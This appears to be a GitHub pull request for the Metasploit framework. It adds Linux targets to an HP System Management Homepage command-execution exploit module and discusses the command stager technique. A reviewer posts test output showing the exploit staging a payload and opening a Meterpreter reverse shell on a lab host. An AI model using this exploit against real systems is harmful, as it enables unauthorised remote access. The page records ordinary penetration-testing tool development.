Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add hp_sys_mgmt_exec module for Linux and enhance module for Windows #2181

Merged
merged 3 commits into from
Aug 8, 2013
Merged

Add hp_sys_mgmt_exec module for Linux and enhance module for Windows #2181

merged 3 commits into from
Aug 8, 2013

Conversation

mwulftange
Copy link
Contributor

The hp_sys_mgmt_exec module for Linux is a port of the Windows module with minor changes due to the requirement of quotes. It also uses Perl instead of PHP as PHP may not always be in the environment PATH. Although the Windows module works perfectly, it now uses the same technique to encode the command (thankfully, PHP adopted major syntax characteristics and functions from Perl).

@mwulftange
Add hp_sys_mgmt_exec module for Linux and enhance module for Windows
4a127c2 
The hp_sys_mgmt_exec module for Linux is a port of the Windows module with minor changes due to the requirement of quotes. It also uses Perl instead of PHP as PHP may not always be in the environment PATH. Although the Windows module works perfectly, it now uses the same technique to encode the command (thankfully, PHP adopted major syntax characteristics and functions from Perl).
@wchen-r7
Copy link
Contributor

wchen-r7 commented Aug 2, 2013

Thanks for the patch. It looks like you can really just merge the linux targets to the existing hp_sys_mgmt_exec module, and then move the file to multi/http/hp_sys_mgmt_exec.rb.

@mwulftange
Copy link
Contributor Author

I’ve already tried that but I didn’t get it to work properly. I tried it with dynamically including the corresponding CmdStager module depending on the target. It worked for CmdStagerBourne but it didn’t work for CmdStagerVBS as it registers the advanced option DECODERSTUB during initialization.

But I’ll give your suggestion a try: I’ll dynamically include the CmdStagerBourne into the existing Windows exploit. That should work as the latter does only overwrite the create_stager method.

@mwulftange
Copy link
Contributor Author

I’ve managed to merge both exploits in a multi platform exploit as described before. This is way more better.

@wchen-r7
Copy link
Contributor

wchen-r7 commented Aug 8, 2013

Beautiful, thanks for the merge! Module works for me, merging to master now:

msf exploit(hp_sys_mgmt_exec) > run

[*] Started reverse handler on 10.0.1.76:4444 
[*] Command Stager progress -   2.77% done (2799/101001 bytes)
[*] Command Stager progress -   5.54% done (5598/101001 bytes)
[*] Command Stager progress -   8.31% done (8397/101001 bytes)
[*] Command Stager progress -  11.09% done (11196/101001 bytes)
[*] Command Stager progress -  13.86% done (13995/101001 bytes)
[*] Command Stager progress -  16.63% done (16794/101001 bytes)
[*] Command Stager progress -  19.40% done (19593/101001 bytes)
[*] Command Stager progress -  22.17% done (22392/101001 bytes)
[*] Command Stager progress -  24.94% done (25191/101001 bytes)
[*] Command Stager progress -  27.71% done (27990/101001 bytes)
[*] Command Stager progress -  30.48% done (30789/101001 bytes)
[*] Command Stager progress -  33.26% done (33588/101001 bytes)
[*] Command Stager progress -  36.03% done (36387/101001 bytes)
[*] Command Stager progress -  38.80% done (39186/101001 bytes)
[*] Command Stager progress -  41.57% done (41985/101001 bytes)
[*] Command Stager progress -  44.34% done (44784/101001 bytes)
[*] Command Stager progress -  47.11% done (47583/101001 bytes)
[*] Command Stager progress -  49.88% done (50382/101001 bytes)
[*] Command Stager progress -  52.65% done (53181/101001 bytes)
[*] Command Stager progress -  55.43% done (55980/101001 bytes)
[*] Command Stager progress -  58.20% done (58779/101001 bytes)
[*] Command Stager progress -  60.97% done (61578/101001 bytes)
[*] Command Stager progress -  63.74% done (64377/101001 bytes)
[*] Command Stager progress -  66.51% done (67176/101001 bytes)
[*] Command Stager progress -  69.28% done (69975/101001 bytes)
[*] Command Stager progress -  72.05% done (72774/101001 bytes)
[*] Command Stager progress -  74.82% done (75573/101001 bytes)
[*] Command Stager progress -  77.60% done (78372/101001 bytes)
[*] Command Stager progress -  80.37% done (81171/101001 bytes)
[*] Command Stager progress -  83.14% done (83970/101001 bytes)
[*] Command Stager progress -  85.91% done (86769/101001 bytes)
[*] Command Stager progress -  88.68% done (89568/101001 bytes)
[*] Command Stager progress -  91.45% done (92367/101001 bytes)
[*] Command Stager progress -  94.22% done (95166/101001 bytes)
[*] Command Stager progress -  96.99% done (97965/101001 bytes)
[*] Command Stager progress -  99.75% done (100748/101001 bytes)
[*] Sending stage (751104 bytes) to 10.0.1.8
[*] Command Stager progress - 100.00% done (101001/101001 bytes)
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.8:1179) at 2013-08-08 13:33:07 -0500

meterpreter >

wchen-r7 added a commit that referenced this pull request Aug 8, 2013
@wchen-r7
Land #2181 - More targets for hp_sys_mgmt_exec
a03d71d 
Thanks mwulftange!
@wchen-r7 wchen-r7 merged commit 9955899 into rapid7:master Aug 8, 2013
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@mwulftange @wchen-r7